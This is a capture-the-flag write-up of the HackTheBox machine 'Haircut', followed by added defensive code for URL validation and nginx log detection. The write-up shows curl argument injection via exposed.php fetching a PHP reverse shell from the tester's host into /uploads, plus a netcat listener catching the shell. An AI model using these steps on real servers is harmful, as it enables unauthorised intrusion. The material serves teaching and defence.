Haircut

# ENUMERATION
NMAP:
- 22: OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
- 80: nginx 1.10.0 (Ubuntu)

================================================================
# ENUMERATION
# FIRST REQUEST FOR 10.10.10.24

GET / HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Mon, 15 May 2017 10:33:52 GMT
If-None-Match: W/"59198410-90"
Cache-Control: max-age=0

- nothing to see here...

HTTP/1.1 304 Not Modified
Server: nginx/1.10.0 (Ubuntu)
Date: Sat, 01 Aug 2020 01:51:49 GMT
Last-Modified: Mon, 15 May 2017 10:33:52 GMT
Connection: close
ETag: "59198410-90"

- return has nothing either...

================================================================
# ENUMERATION
# GOBUSTER

http://10.10.10.24:80/index.html (Status: 200) [Size: 144]
http://10.10.10.24:80/uploads (Status: 301) [Size: 194]
http://10.10.10.24:80/test.html (Status: 200) [Size: 223]
http://10.10.10.24:80/hair.html (Status: 200) [Size: 141]
http://10.10.10.24:80/exposed.php (Status: 200) [Size: 446]

http://10.10.10.24/exposed.php

Enter the Hairdresser's location you would like to check.
Example: http://localhost/test.html
[this was an area to enter an address...]

Requesting Site...
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100   141  100   141    0     0  61679      0 --:--:-- --:--:-- --:--:-- 70500

- There's a picture of "CARRIE CURL" on the bottom... that clues in the tool curl.

http://10.10.10.24/uploads/
403 Forbidden
nginx/1.10.0 (Ubuntu)

================================================================
- Changing the request in BurpSuite sent this...

Requesting Site...
% is not a good thing to put in a URL

- Let's curl with this box (exposed.php showed a picture of CARRIE CURL)
- add an output argument: -o winning.php

Requesting Site...
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
Warning: Failed to create the file winning.php: Permission denied
100   223  100   223    0     0  44950      0 --:--:-- --:--:-- --:--:-- 55750
curl: (23) Failed writing body (0 != 223)

- Permission Denied... what about the other directory (uploads)...
- Yep, it worked... no errors encountered in the search box:
  http://localhost/test.php -o uploads/winning.php
- Navigating to the new site worked... so can I put code in there?
  http://10.10.10.24/uploads/winning.php
- What about checking my own IP address with this curl function?
  http://10.10.14.30/test.html
  curl: (7) Failed to connect to 10.10.14.30 port 80: Connection refused

================================================================
# ENUMERATION
# SIMPLEHTTPSERVER
- use the search box to request http://10.10.14.30/test.html

Error response
Error code 404.
Message: File not found.
Error code explanation: 404 = Nothing matches the given URI.

- So it's reaching out to my machine, and verified with the SimpleHTTPServer logs:

Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.24 - - [31/Jul/2020 22:16:48] code 404, message File not found
10.10.10.24 - - [31/Jul/2020 22:16:48] "GET /test.html HTTP/1.1" 404 -

- Can we get a file to the server?
- Created a reverse.php from: https://github.com/pentestmonkey/php-reverse-shell
- Host it using python -m SimpleHTTPServer 80
- Use the search box to get the shell and move it to the uploads directory:
  http://10.10.14.30/reverse.php -o uploads/reverse.php

Requesting Site...
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100  5492  100  5492    0     0  37619      0 --:--:-- --:--:-- --:--:-- 37875

- Verified that the file was uploaded (logs from SimpleHTTPServer)

Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.24 - - [31/Jul/2020 22:23:40] "GET /reverse.php HTTP/1.1" 200 -

================================================================
# EXPLOIT
# REQUEST THE PAGE
- Set up a Netcat listener and visit the site...

kali@kali:~/HTB/RETIRED/Haircut/uploads$ nc -nvlp 1337
listening on [any] 1337 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.24] 52186
Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:28:56 up 46 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

FOOT-HOLD ACCOMPLISHED!
- Tag this machine for future privilege escalation tasks...
================================================================
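The root cause of the foothold above is that exposed.php hands a user-supplied "location" string to curl in a way that lets extra tokens such as -o uploads/winning.php be honoured as curl options. The source of exposed.php is not on the page, so the following is an added, defensive example (not the box's code) of how a URL-checking feature should treat that input: reject anything that is not a single clean http/https URL, restrict the host to an assumed allowlist, and build the curl argv as a list passed to subprocess without a shell, with "--" ending option parsing so the URL can never be read as a flag. The allowlist contents and the flag set are my choices, not the page's.

```python
"""Hardened handling of a user-supplied URL before it reaches curl.

Added example for the Haircut write-up, not the box's own exposed.php.
It assumes the vulnerable pattern is a user string concatenated into a
curl command line (consistent with "-o uploads/winning.php" being
honoured); the real PHP source is not on the page.
"""
import re
import subprocess
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the "location check" is meant to reach.
ALLOWED_HOSTS = {"localhost", "127.0.0.1"}

# Conservative URL alphabet.  Whitespace is deliberately absent: a space is
# what turns "-o uploads/x.php" into a separate curl argument.
_URL_CHARS = re.compile(r"^[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+$")


def validate_location_url(raw: str) -> str:
    """Return the URL unchanged if it is safe to hand to curl, else raise ValueError."""
    if not _URL_CHARS.fullmatch(raw):
        raise ValueError("URL contains whitespace or disallowed characters")
    if raw.startswith("-"):
        raise ValueError("URL must not look like a command-line option")
    parts = urlsplit(raw)
    if parts.scheme not in ("http", "https"):
        raise ValueError("only http/https are permitted")
    if not parts.hostname:
        raise ValueError("URL has no host")
    if parts.hostname.lower() not in ALLOWED_HOSTS:
        raise ValueError(f"host {parts.hostname!r} is not on the allowlist")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not permitted")
    return raw


def curl_argv(raw: str) -> list:
    """Build curl's argv as a list (never a shell string) for a validated URL."""
    url = validate_location_url(raw)
    # "--" ends option parsing; the remaining flags bound the request so the
    # feature cannot be turned into a file writer or a long-running fetcher.
    return ["curl", "-sS", "--max-time", "10", "--max-filesize", "65536", "--", url]


def fetch_location(raw: str) -> bytes:
    """Run the validated command without a shell and return the response body."""
    result = subprocess.run(curl_argv(raw), capture_output=True,
                            check=False, timeout=15)
    return result.stdout


if __name__ == "__main__":
    for candidate in ("http://localhost/test.html",
                      "http://localhost/test.html -o uploads/winning.php",
                      "http://10.10.14.30/reverse.php -o uploads/reverse.php"):
        try:
            print("accepted:", curl_argv(candidate))
        except ValueError as exc:
            print("rejected:", candidate, "->", exc)
```

Both injection strings used on the box are rejected before curl is ever started: the whitespace check catches the extra -o token, and the host allowlist catches the fetch from the tester's own machine. In a PHP application the same checks would sit in front of escapeshellarg() on the single URL value, or the call would use the curl extension instead of a shell command.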
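From the server side, the sequence that produced the shell leaves a clear trace in the nginx access log: a request to exposed.php from one client, followed shortly by a request for a .php file under /uploads/ from the same client, served with status 200. The following is an added detection example (not part of the write-up) that parses nginx combined-format lines and raises an alert for any PHP request under /uploads/, escalating it when the same client hit exposed.php within a short window. The log lines are constructed for the example; the client addresses and timestamps are illustrative, and nothing on the page shows the box's own access log.

```python
"""Detect PHP being served from an upload directory after a fetch via exposed.php.

Added example, not code from the Haircut write-up.  Sample log lines are
constructed in nginx combined format; 10.10.14.30 is the tester's address
from the write-up, 192.0.2.7 is a documentation address used as a second client.
"""
import re
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
UPLOAD_PHP = re.compile(r"^/uploads/.*\.php(\?.*)?$", re.IGNORECASE)
FETCHER_PATH = "/exposed.php"  # the URL-fetching endpoint found by gobuster

# Constructed sample access log (deliberately out of time order).
SAMPLE_LOG = [
    '10.10.14.30 - - [31/Jul/2020:22:16:48 +0000] "POST /exposed.php HTTP/1.1" 200 446 "http://10.10.10.24/exposed.php" "Mozilla/5.0"',
    '10.10.14.30 - - [31/Jul/2020:22:23:55 +0000] "GET /uploads/reverse.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.30 - - [31/Jul/2020:22:10:01 +0000] "GET /hair.html HTTP/1.1" 200 141 "-" "Mozilla/5.0"',
    '10.10.14.30 - - [31/Jul/2020:22:20:00 +0000] "GET /uploads/ HTTP/1.1" 403 194 "-" "Mozilla/5.0"',
    '192.0.2.7 - - [31/Jul/2020:23:05:00 +0000] "GET /uploads/winning.php HTTP/1.1" 200 223 "-" "curl/7.68.0"',
]


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, window: timedelta = timedelta(minutes=10)) -> list:
    """Return alerts for PHP requested under /uploads/, correlated with exposed.php use."""
    records = sorted(filter(None, map(parse_line, lines)), key=lambda r: r["time"])
    last_fetch = {}  # client ip -> time of its most recent exposed.php request
    alerts = []
    for rec in records:
        if rec["path"].split("?", 1)[0] == FETCHER_PATH:
            last_fetch[rec["ip"]] = rec["time"]
        if not UPLOAD_PHP.match(rec["path"]):
            continue
        # A 200 means the script was executed (or at least served), not just probed.
        severity = "high" if rec["status"] == 200 else "medium"
        reason = "PHP requested under /uploads/"
        prior = last_fetch.get(rec["ip"])
        if prior is not None and rec["time"] - prior <= window:
            severity = "critical"
            reason += " shortly after the same client used exposed.php"
        alerts.append({"ip": rec["ip"], "time": rec["time"].isoformat(),
                       "path": rec["path"], "status": rec["status"],
                       "severity": severity, "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The 403 on /uploads/ itself is not flagged: directory listing being denied is the expected behaviour and, as the write-up shows, says nothing about whether PHP under that path is executed. The matching hardening on the web server is to refuse PHP execution under the upload path altogether, for example an nginx location block for ^/uploads/.*\.php$ that returns 403, so a file placed there can be fetched but never run.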